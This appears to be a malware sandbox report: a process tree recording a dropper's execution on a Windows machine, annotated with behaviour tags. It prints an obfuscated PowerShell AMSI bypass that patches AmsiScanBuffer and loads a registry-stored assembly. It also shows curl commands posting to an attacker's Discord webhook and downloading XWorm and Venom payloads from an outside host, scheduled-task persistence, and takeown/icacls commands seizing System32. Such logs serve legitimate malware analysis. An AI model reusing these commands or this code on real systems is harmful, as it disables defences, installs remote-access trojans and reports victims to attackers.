C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vtIxbQQfuscv{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$YckgfmcwZQNedn,[Parameter(Position=1)][Type]$OxzSZOgcBx)$IwKypozhfxc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'d'+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+'r'+'y'+'M'+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'pe','C'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+'u'+'bl'+'i'+'c'+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+'s'+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$IwKypozhfxc.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+'y'+[Char](83)+''+'i'+'g'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$YckgfmcwZQNedn).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$IwKypozhfxc.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+'Hid'+[Char](101)+''+'B'+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+'tua'+[Char](108)+'',$OxzSZOgcBx,$YckgfmcwZQNedn).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+'a'+'na'+[Char](103)+''+'e'+''+'d'+'');Write-Output $IwKypozhfxc.CreateType();}$rlsgIwglFeXTb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+'.'+''+'d'+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+'c'+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+'t'+'i'+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$qRbADMlCMXDMbP=$rlsgIwglFeXTb.GetMethod(''+[Char](71)+'et'+[Char](80)+'r'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$dWaUMQXAEiAXorDSbXh=vtIxbQQfuscv @([String])([IntPtr]);$pXTGShfRMRQzpankShrQzY=vtIxbQQfuscv @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TzFbcYQwBWU=$rlsgIwglFeXTb.GetMethod(''+'G'+'e'+[Char](116)+'Mod'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+'ndl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$yxVVHEtRRcwLrt=$qRbADMlCMXDMbP.Invoke($Null,@([Object]$TzFbcYQwBWU,[Object](''+[Char](76)+''+'o'+''+[Char](97)+'d'+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$JTsQHTJjijvAqouIF=$qRbADMlCMXDMbP.Invoke($Null,@([Object]$TzFbcYQwBWU,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+[Char](101)+'ct')));$EtItkiw=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yxVVHEtRRcwLrt,$dWaUMQXAEiAXorDSbXh).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$rmFzTXdzcwsXVeMhS=$qRbADMlCMXDMbP.Invoke($Null,@([Object]$EtItkiw,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$CGNHjKRiKR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JTsQHTJjijvAqouIF,$pXTGShfRMRQzpankShrQzY).Invoke($rmFzTXdzcwsXVeMhS,[uint32]8,4,[ref]$CGNHjKRiKR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rmFzTXdzcwsXVeMhS,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JTsQHTJjijvAqouIF,$pXTGShfRMRQzpankShrQzY).Invoke($rmFzTXdzcwsXVeMhS,[uint32]8,0x20,[ref]$CGNHjKRiKR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'FT'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1388

C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
2⤵
PID:4528

C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
2⤵
PID:3380

C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
2⤵
PID:1128

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1368

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1428

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x324 0x490
2⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2000

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2696

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2712

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2852

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3412

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Users\Admin\AppData\Local\Temp\Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
3⤵
- Suspicious use of WriteProcessMemory
PID:1968

C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
4⤵
PID:2356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4032

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe
4⤵
PID:4312

C:\Users\Admin\yar.exe
"C:\Users\Admin\yar.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
4⤵
- Creates scheduled task(s)
PID:4616

C:\Users\Admin\AppData\Local\Temp\cwnctj.exe
"C:\Users\Admin\AppData\Local\Temp\cwnctj.exe"
4⤵
PID:1144

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe"
4⤵
PID:2032

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /watchdog
5⤵
PID:948

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /watchdog
5⤵
PID:704

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /watchdog
5⤵
PID:4368

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /watchdog
5⤵
PID:5076

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /watchdog
5⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\jzkbst.exe
"C:\Users\Admin\AppData\Local\Temp\jzkbst.exe" /main
5⤵
PID:2100

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" \note.txt
6⤵
PID:1888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://google.co.ck/search?q=virus+builder+legit+free+download
6⤵
PID:6524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe2ad146f8,0x7ffe2ad14708,0x7ffe2ad14718
7⤵
PID:1976

C:\Users\Admin\AppData\Local\Temp\idlbjl.exe
"C:\Users\Admin\AppData\Local\Temp\idlbjl.exe"
4⤵
PID:3324

C:\DRACO.EXE
"C:\DRACO.EXE"
5⤵
PID:1988

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
6⤵
PID:4620

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1628

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2324

C:\Users\Admin\AppData\Local\Temp\2881554434\C37S31I5F02A1MR1K86.exe
"C:\Users\Admin\AppData\Local\Temp\2881554434\C37S31I5F02A1MR1K86.exe"
6⤵
PID:1104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:4612

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5368

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6036

C:\Users\Admin\AppData\Local\Temp\acrocef_low\S65B25J0D24F0OR2M83.exe
"C:\Users\Admin\AppData\Local\Temp\acrocef_low\S65B25J0D24F0OR2M83.exe"
6⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:2916

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5840

C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin\A38T68J6P35U8PE3B47.exe
"C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin\A38T68J6P35U8PE3B47.exe"
6⤵
PID:920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:5204

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5796

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6348

C:\Users\Admin\AppData\Local\Temp\Low\J62T74I2E22W4GT1X76.exe
"C:\Users\Admin\AppData\Local\Temp\Low\J62T74I2E22W4GT1X76.exe"
6⤵
PID:3880

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:6048

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6748

C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219\D54X88Q1G83I0MG8S40.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219\D54X88Q1G83I0MG8S40.exe"
6⤵
PID:2032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:6044

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:7136

C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant "Admin:F"
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6948

C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219\A65Y25Q3Q25C7PT1I01.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219\A65Y25Q3Q25C7PT1I01.exe"
6⤵
PID:4508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 384
8⤵
- Program crash
PID:6428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 396
8⤵
- Program crash
PID:4612

C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\L47H85O6I07R7VL6O25.exe
"C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\L47H85O6I07R7VL6O25.exe"
6⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:5504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 76
8⤵
- Program crash
PID:6180

C:\Users\Admin\AppData\Local\Temp\OneNote\U60H02N2X04S2MA5L54.exe
"C:\Users\Admin\AppData\Local\Temp\OneNote\U60H02N2X04S2MA5L54.exe"
6⤵
PID:5392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:1276

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6404

C:\Users\Admin\AppData\Local\Temp\OneNote\16.0\S42Z02V8U44C4RL5L86.exe
"C:\Users\Admin\AppData\Local\Temp\OneNote\16.0\S42Z02V8U44C4RL5L86.exe"
7⤵
PID:6508

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
8⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\OneNote\16.0\Exported\J81D76N6B61F5DL4C63.exe
"C:\Users\Admin\AppData\Local\Temp\OneNote\16.0\Exported\J81D76N6B61F5DL4C63.exe"
8⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\WE_DO_H0\N54T38Q7M78H7LV3A87.exe
"C:\Users\Admin\AppData\Local\Temp\WE_DO_H0\N54T38Q7M78H7LV3A87.exe"
6⤵
PID:5704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:5336

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6204

C:\Users\Admin\AppData\Local\Temp\WE_DO_H1\A03D40R3U33G4QH6T36.exe
"C:\Users\Admin\AppData\Local\Temp\WE_DO_H1\A03D40R3U33G4QH6T36.exe"
6⤵
PID:2068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:7112

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6452

C:\Users\Admin\AppData\Local\Temp\WE_DO_H2\C61E70O0N13M8OB2K43.exe
"C:\Users\Admin\AppData\Local\Temp\WE_DO_H2\C61E70O0N13M8OB2K43.exe"
6⤵
PID:5736

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:7096

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6200

C:\Users\Admin\AppData\Local\Temp\WE_DO_H3\V24R74W8C82E7ND0D43.exe
"C:\Users\Admin\AppData\Local\Temp\WE_DO_H3\V24R74W8C82E7ND0D43.exe"
6⤵
PID:2860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:2280

C:\Users\Admin\AppData\Local\Temp\WE_DO_H4\N38C07T0U03P1NX6W56.exe
"C:\Users\Admin\AppData\Local\Temp\WE_DO_H4\N38C07T0U03P1NX6W56.exe"
6⤵
PID:3356

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:6276

C:\Users\Admin\AppData\Local\Temp\{332AB619-B716-4586-ADE7-FB2C61A0C00F}\W71U60Q3Z84K4ME2B16.exe
"C:\Users\Admin\AppData\Local\Temp\{332AB619-B716-4586-ADE7-FB2C61A0C00F}\W71U60Q3Z84K4ME2B16.exe"
6⤵
PID:6568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F" && exit
7⤵
PID:6920

C:\Users\Admin\AppData\Local\Temp\pftcxn.exe
"C:\Users\Admin\AppData\Local\Temp\pftcxn.exe"
4⤵
PID:5560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:3716

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe
4⤵
PID:916

C:\Users\Admin\sachost.exe
"C:\Users\Admin\sachost.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1068

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe
4⤵
PID:404

C:\Users\Admin\penisware.exe
"C:\Users\Admin\penisware.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1924

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"
4⤵
- Creates scheduled task(s)
PID:2032

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4484

C:\Windows\SysWOW64\curl.exe
curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe
4⤵
PID:2660

C:\Users\Admin\penisballs.exe
"C:\Users\Admin\penisballs.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4268

